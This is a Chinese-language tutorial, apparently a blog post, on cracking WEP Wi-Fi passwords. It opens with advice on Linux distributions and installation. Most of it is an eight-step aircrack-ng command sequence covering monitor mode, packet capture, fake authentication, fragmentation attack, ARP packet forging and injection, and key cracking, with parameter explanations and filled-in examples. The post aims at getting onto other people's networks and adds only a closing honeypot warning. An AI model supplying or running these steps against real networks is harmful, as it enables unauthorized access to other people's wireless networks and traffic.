看到網(wǎng)絡上很多教程,雖說都是面向我們這種"菜鳥",可往往幾條操作了事,沒有說明,這里我結合自己的實際情況寫一點步驟,不是完全原創(chuàng),但盡量把一些可能遇到的情況說明到,希望對大家有幫助。

首先是平臺選擇的問題,網(wǎng)上推薦都是基于LINUX的BT3/4.BT系列很強大,但我感覺有些誤解，而且有為USB網(wǎng)卡做廣告嫌疑
一是BT太強大,不僅僅是無線破解這么一點點功能,藍牙,網(wǎng)絡等很多安全工具,只要肯研究,會有很多發(fā)現(xiàn),網(wǎng)上把BT的功能多少有些歪曲了.BT3 和BT4界面相同,但實質不太一樣,bt3基于slax,而同樣基于slax還有wifislax等.bt4基于ubuntu,而同樣基于ubuntu的 還有nubuntu等.有些操作命令不太一樣,所以如果失敗的時候注意一下是不是系統(tǒng)選擇錯了,眼界放寬些,不要就盯著BT不放,呵呵.

其次是BT的缺點,它對硬件比較挑,特別是網(wǎng)卡以及顯卡(搞不明白為什么顯卡),如果系統(tǒng)都裝不好以下的破解過程就算白說了。網(wǎng)卡代表是瑞銀,驅動不好 弄.顯卡代表是ATI,特別是ATI的寬屏筆記本,基本可以放棄了。如果能安裝好BT最好,不能的話我給大家推薦幾個,一是UBUNTU9.04(目前最 新是9.10),一是CDlinux-0.9.4-wireless(目前最新是0.95),還就是beini-1.0-rc5.1(目前最新，沒怎么試 過)。選UBUNTU9.04是因為它對硬件適應性好，BT系列不能識別的網(wǎng)卡顯卡它就有可能識別，不用為了僅破個WEP密碼專門買USB網(wǎng)卡，而且還說 不定仍然不能識別！另外可以無痛簡單的用“wubi”安裝在硬盤上，如果有人嘗試過wubi無法安裝9.10（好象是grub引導式升級了）或用其他方法 硬盤安裝好ubuntu雙系統(tǒng)后恢復XP時mbr出現(xiàn)問題急得撓墻就會認同我的觀點了...，具體點是xinyang-ubuntu-9.04- chinese-customize-release這個改版，也叫“新氧”。CDlinux0.94里有很多0.95里反倒沒有的軟件，不知道為什 么.0.95也有個別0.94沒有的，所以我的建議是同時下載，然后把0.95里的“l(fā)ocal”，“extra”文件夾里一些模塊放入0.94里重新打 包為鏡像文件，就可以集二者的優(yōu)點了，0.95的一個特點就是把 “Beini”里的“feedingbottle”提取出來了，很方便。

系統(tǒng)選好了接著是安裝，ubuntu“wubi”比較簡單化，需要注意的是欲安裝ubuntu的非系統(tǒng)盤設為NTFS格式，建新建文件夾，命名為 “iso”將鏡像文件與安裝文件一同放入iso文件夾，鏡像文件xinyang-ubuntu-9.04-chinese-customize- release.iso重命名為installation.iso，wubi不要用官方，不然光下載鏡像文件都能等到頭發(fā)都白了...推薦“wubi- hd”這個改版.CDLinux可以直接解壓到C盤，然后grub編輯一下“boot.ini”，“menu”后啟動，但CDLinux缺點是操作后的內 容下次重啟就沒了，記得手動把有用的東西copy到其他非系統(tǒng)盤里，應該是系統(tǒng)本身的問題，不過如果把它僅作為無線破解就無所謂了

下面是重頭戲，無線破解的具體步驟。我著重寫命令行下，因為LINUX自由地太惡心，特別是軟件安裝，大家都隨心所欲，結果反倒不自由了，以 “spoonwep”在不同系統(tǒng)下安裝為典型代表，折騰死人。命令行很麻煩，但畢竟通用，而且懶人copy不難...

一共八條，下有解釋。我在ubuntu下為例，事先最好“聯(lián)網(wǎng)”的情況下命令行

“sudo apt-get install aircrack-ng”等一下，下載必須軟件。CDLinux不用，但CDLinux命令行下好像不能copy，辛苦點手動吧。

1) ifconfig -a
2) airmon-ng start wifi0 6
3) airodump-ng --ivs -w name -c 6 ath1
4) 重開終端，前面的不要關，aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 -1 is -one
5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
7) aireplay-ng -2 -r mrarp -x 1024 ath1
8) 重開終端，前面的不要關，aircrack-ng -n 64 -b ap_mac name-01.ivs

1) ifconfig -a
1）這個命令用于找到自己的無線網(wǎng)卡的 Mac地址，注意有線網(wǎng)卡一般是eth0，筆記本內置無線網(wǎng)卡可能是eth1，wifi0，wlan0等，安裝虛擬機后還有虛擬機的虛擬網(wǎng)卡。usb網(wǎng)卡 也有自己的命名當初因為這么一點東西教程不提醒疑惑好久，我以wlan0為例

2) airmon-ng start wifi0 6
2）這個命令用于將自己的無線網(wǎng)卡置于Monitor 模式，即類似一個AP的效果，因此可以有抓別人包的功能。

第一個ifconfig -a命令可以看得到。wifi0 后面的那個6 ，是需要破解的AP的頻道，最常見。還有可能是11，1等。運行命令成功以后，你會看到返回的提示顯示出現(xiàn)一個 Ath1（如果你是 Athoes的無線網(wǎng)卡的話就是這個，其他的可能為mon0）這個就是你的用于破解的網(wǎng)卡代號。這個命令，簡而言之，就是把你的無線網(wǎng)卡置于監(jiān)控模式，并 且指定監(jiān)控的頻道。如果你發(fā)現(xiàn)弄錯了頻道，那么沒關系，重新運行一遍就可以了，不過這個時候，可能就會變成 Ath2...Ath3 等等，但是好像最多運行三次，然后就會失敗。

例：sudo airmon-ng start wlan0 6 顯示如下

Interface    Chipset        Driver

mon0        Unknown     iwlagn – [phy0]
(monitor mode enabled on mon0            

6是指你需要監(jiān)控的頻道，必須和第二個命令里的一樣， ath1是剛才第二步出現(xiàn)的別名。

3) airodump-ng --ivs -w name -c 6 ath1
3）這個命令比較關鍵，你運行以后，就會列出所有該頻道的AP。“name”隨便改，寫成你名字也沒關系
顯示的內容比較多，簡單介紹一下：
BSSID : 其實就是AP的Mac 地址
PWR： AP信號的大小，一般，低于10，就比較麻煩了，不過還不是沒可能，我曾經(jīng)見過負值...還可以出來
RXQ： 干擾的大小
Beacons：發(fā)送接受的包，參考信息，在跳說明有數(shù)據(jù)
#Data： 這個比較重要，是接受到可以用來破解的特殊包，如果一直不變，那么，說明沒有客戶端連接，破解可能很麻煩，如果對方有大文件在下載，那么這個跳的速度非常快，

10來分鐘就可以有足夠的包來破解了，如果跳得很慢，那么，就需要用一些特殊的方式來破解了。破解一般數(shù)據(jù)要上萬，不過不用怕，最夸張只要多等一會兒有2個以上就可以的（見后）
CH：頻道
MB：網(wǎng)絡連接速度 54就是54MB
ENC， CIPHER，AUTH
這些是加密方式，我們這次只討論顯示為 WEP 和 WEP+ OPN
ESSID： 這個是AP的名字，需要以后用到的。如果是中文貌似會出問題。因此為了阻擋別人破解，可以用中文的ESSID
這個窗口就開著好了，不用關閉，以后的命令，需要重新打開一個終端窗口操作。

例：sudo airodump-ng --ivs -w name -c 6 mon0

4) 重開終端，前面的不要關，aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 -1 is -one
4）“aireplay-ng”后的是數(shù)字1不是字母l，敲鍵盤的同志注意了。
這一步開始，我們要做一些真正的破解工作，主要是針對那些客戶端僅僅連接，沒什么流量的AP，這種AP，#Data的增長非常慢，往往需要很長的時間才有 可能取得足夠的包，這個時候就需要 aireplay-ng 出面了，顧名思義，這個軟件就是 Replay，也就是說，模擬發(fā)包。

首先解釋命令：
-e ap_essid ，“ap_essid”就是 -e 之后加上被破解的essid ，3步驟可見到，或者最簡單windows下直接查看無線網(wǎng)絡即可比如 TP-LINK ， linksys ，注意大小寫。
-a ap_mac ，  “ap_mac”就是 -a 之后加上你需要破解的AP的Mac地址，第三步BSSID就可以看得到。還有可能顯示為"xx-xx","xx:xx"的形式，不需要“ ：”或“-”哦。
-h XXXXXXXXXX 就是 -h 之后，加上你“自己”無線網(wǎng)卡的 Mac地址， 在第一步你可以得到。
如果成功了，那么會顯示Successful :> 字樣。否則，請讓信號強度大于10。

例：aireplay-ng -1 0 -e TP-LINK -a 001900123456 -h 001900345678 mon0

5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
5）這是一條命令的執(zhí)行，和#data包有關，如果#Data 沒有增加，則這個命令會一直執(zhí)行，直到捕獲一個#Data包。捕獲以后，程序會問你是否需要用這個包來模擬攻擊。回答Y即可。如果攻擊成功，則會顯示成 功，失敗往往是因為信號太差造成的， 如果攻擊失敗（往往是捕獲的包有問題），程序重試N次以后，或自動重新開始捕捉包，繼續(xù)進行即可。等成功完成以后，會顯示一個文件名：fragment- XXXXX-XXXXXX.xor這個文件名，XXXXX里面是數(shù)字，是一個文件。馬上會用得到。這一步是最有可能失敗的一步，盡量保持信號好一點。

例：  sudo aireplay-ng -5 -b 001900123456 -h 001900345678 mon0

6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
6）參數(shù)比較多，fragment-XXXXX-XXXXXX.xor 就是第五步顯示的那個文件名。其余同前。
這一步會很快做完， 顯示生成文件到 mrarp啥的，其實就是破解包的準備過程。

例：sudo packetforge-ng -0 -a 001900123456 -h 001900345678 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1226-122412.xor -w mrarp

7) aireplay-ng -2 -r mrarp -x 1024 ath1
7）ath1 是 你的無線網(wǎng)卡的名字，1024 是攻擊速度，1024是最大值了，如果你的無線網(wǎng)卡不是MiniPCI的，個人建議設為 512 ，這樣不容易死機。

當這一步開始執(zhí)行，你會看到第一個終端窗口里面，你破解的那個AP后面的 #Data在飛速增長！（成功的前兆）一般是 200～400個/s的速度，只需等待即可

例：sudo aireplay-ng -2 -r mrarp -x 512 mon0

8) 重開終端，前面的不要關，aircrack-ng -n 64 -b ap_mac name-01.ivs
8）等到#Data差不多上萬，運行該命令，如果運氣好，一會兒就會顯示破解出來的密碼，同時會顯示 對應的Assic碼，如果不是標準Assic碼，就是一串數(shù)字，記錄下來，查查ASCII碼表就可以出來了。或者直接輸入這串數(shù)字，不帶任何符號，如 1234567890.運氣不好的情況，這個程序會繼續(xù)等待更多的#Data，等到了，就會重新計算一次密碼。不過也有可能上10萬個#Data都沒能算 出來，那個密碼估計是把26個字母加數(shù)字加特殊符等統(tǒng)統(tǒng)用了一遍，設計那個密碼的人記性一定很好，呵呵。

“name-01.ivs” 其實是第三步自動生成的一個文件， 如果你多次運行了第三步，那么，可能會生成多個 name-XX.ivs文件， 你可以到對應的文件夾里看一下（一般就在桌面上的第一個文件夾圖標里），找到XX最大的那個，就是你當前正在使用的這個文件。其余同前

例：sudo aircrack-ng -n 64 -b 001900123456 name-03.ivs

只針對 WEP 密碼的破解，而且，最好有得到認證的客戶端連接在這個AP上，如果沒有，有些AP（比如TP-LINK）能夠被破解，某些可能就無法破解。如果WPA或 WPA2加密，基本放棄吧。很不幸，千辛萬苦弄出來然后基本拿字典跑吧，嚴重體現(xiàn)RP的時刻。

另外，出來混，遲早要還的，說不定你輕松破解的正好是個蜜罐，你樂滋滋無線上網(wǎng)時QQ密碼，網(wǎng)銀，帳號什么的已經(jīng)被人拿走了，天外有天，人外有人，玩一玩知道原理就行了

多看看其他的，有好幾種不同的命令行下的方法，盡量弄懂參數(shù)含義。我的只是盡可能普遍適用，點鼠標方法的比如spoonwep，miniwep等，也很好

關健詞：Linux